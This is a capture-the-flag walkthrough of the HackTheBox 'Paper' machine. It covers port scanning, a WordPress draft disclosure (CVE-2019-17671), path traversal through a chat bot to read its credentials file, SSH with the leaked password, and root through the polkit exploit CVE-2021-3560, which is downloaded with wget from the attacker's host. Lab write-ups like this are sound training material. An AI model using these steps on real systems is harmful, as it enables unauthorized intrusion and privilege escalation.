Paper - [HTB]

Marmeus

Introduction

Paper is a pretty easy Linux machine from HackTheBox where the attacker has to exploit a WordPress vulnerability (CVE-2019-17671) to gain access to a chat web application, then abuse the services of a chatbot to become a user. Finally, we have to exploit the famous polkit vulnerability (CVE-2021-3560) in order to become root.

Enumeration

As always, let's start by finding all open ports on the machine with Nmap.

kali@kali:~/Documents/HTB/Paper$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.11.143
Warning: 10.10.11.143 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.143
Host is up (0.043s latency).
Not shown: 61511 closed ports, 4021 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
kali@kali:~/Documents/HTB/Paper$

Then we continue with a deeper scan of each open port to get more information about each service.

kali@kali:~/Documents/HTB/Paper$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80,443 10.10.11.143
Nmap scan report for 10.10.11.143
Host is up (0.042s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 14 15:19:20 2022 -- 1 IP address (1 host up) scanned in 16.38 seconds

Looking at the HTTP headers, we find the domain office.paper in the X-Backend-Server header.

kali@kali:~/Documents/HTB/Paper$ curl -i http://10.10.11.143/asdasd
HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2022 21:09:28 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

Once added to /etc/hosts, we can access office.paper's WordPress page.

[Image: Blunder Tiffin WordPress site]

Thanks to wpscan, we learn that this WordPress version has a known vulnerability.

kali@kali:~/Documents/HTB/Paper$ wpscan --url http://office.paper/ -e ap,at,dbe,u --random-user-agent --detection-mode aggressive --plugins-detection aggressive --disable-tls-checks
[...]
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/

We can exploit it by visiting http://office.paper/?static=1, which returns a bunch of drafts. Among the drafts, we find a registration link.

test

Micheal please remove the secret from drafts for gods sake!

Hello employees of Blunder Tiffin,

Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.

So, I kindly request you all to take your discussions from the public blog to a more private chat system.

-Nick

# Warning for Michael

Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick

Threat Level Midnight

A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT

[INT:DAY]

Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….

# Secret Registration URL of new Employee chat system

http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.

# Also, stop looking at my drafts. Jeez!

This link leads us to a Rocket.Chat web application.

[Image: Rocket.Chat login page]

Once registered and logged in, we find a bot in the general channel with instructions on how to use it.

[Image: Bot chat]

To interact with Recyclops, we need to open a private chat with it.

[Image: Recyclops private chat]

As we can see, Recyclops can list files under the /sales/ folder.


Moreover, it is vulnerable to path traversal, so we can list files from parent directories.

[Image: dwight's home directory]

Under the ../hubot/ directory there is a .env file.

[Image: hubot files]

The .env file contains Recyclops's credentials.

[Image: Configuration file]

These credentials can be used to access the machine as Dwight over SSH.

kali@kali:~/Documents/HTB/Paper$ ssh dwight@office.paper
dwight@office.paper's password: Queenofblad3s!23

[dwight@paper ~]$ cat user.txt 
[CENSORED]

Privilege Escalation

Using LinPEAS, we find that a polkit binary (polkit-agent-helper-1) is SUID.

SUID - Check easy privesc, exploits and write perms
-rwsr-xr-x. 1 root root  61K May 11  2019 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)            
-rwsr-xr-x  1 root root  34K May 11  2019 /usr/bin/fusermount3             
-rwsr-xr-x. 1 root root  38K May 11  2019 /usr/bin/fusermount
-rwsr-xr-x. 1 root root  18K May 11  2019 /usr/lib/polkit-1/polkit-agent-helper-1               
-rwsr-xr-x  1 root root  65K Nov  8  2019 /usr/bin/crontab
-rwsr-xr-x  1 root root  33K Apr  6  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                           
-rwsr-xr-x  1 root root  21K Feb  2  2021 /usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper (Unknown SUID binary)

So, we can exploit it to become root with the following exploit.

[dwight@paper tmp]$ wget http://10.10.14.223/CVE-2021-3560.py
--2022-02-14 17:06:44--  http://10.10.14.223/CVE-2021-3560.py
Connecting to 10.10.14.223:80... connected.
HTTP request sent, awaiting response... 200 OK                                          
Length: 2434 (2.4K) [text/plain]                                             
Saving to: ‘CVE-2021-3560.py’                                                       
CVE-2021-3560.py         100%[==============>]   2.38K  --.-KB/s    in 0s       
2022-02-14 17:06:44 (295 MB/s) - ‘CVE-2021-3560.py’ saved [2434/2434]                                                                                                                                                                                                  
[dwight@paper tmp]$ python3 CVE-2021-3560.py 
[...]
[+] Timed out at: 0.00890119250816805
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 
bash: cannot set terminal process group (79814): Inappropriate ioctl for device
bash: no job control in this shell
[root@paper tmp]#  cat /root/root.txt
[CENSORED]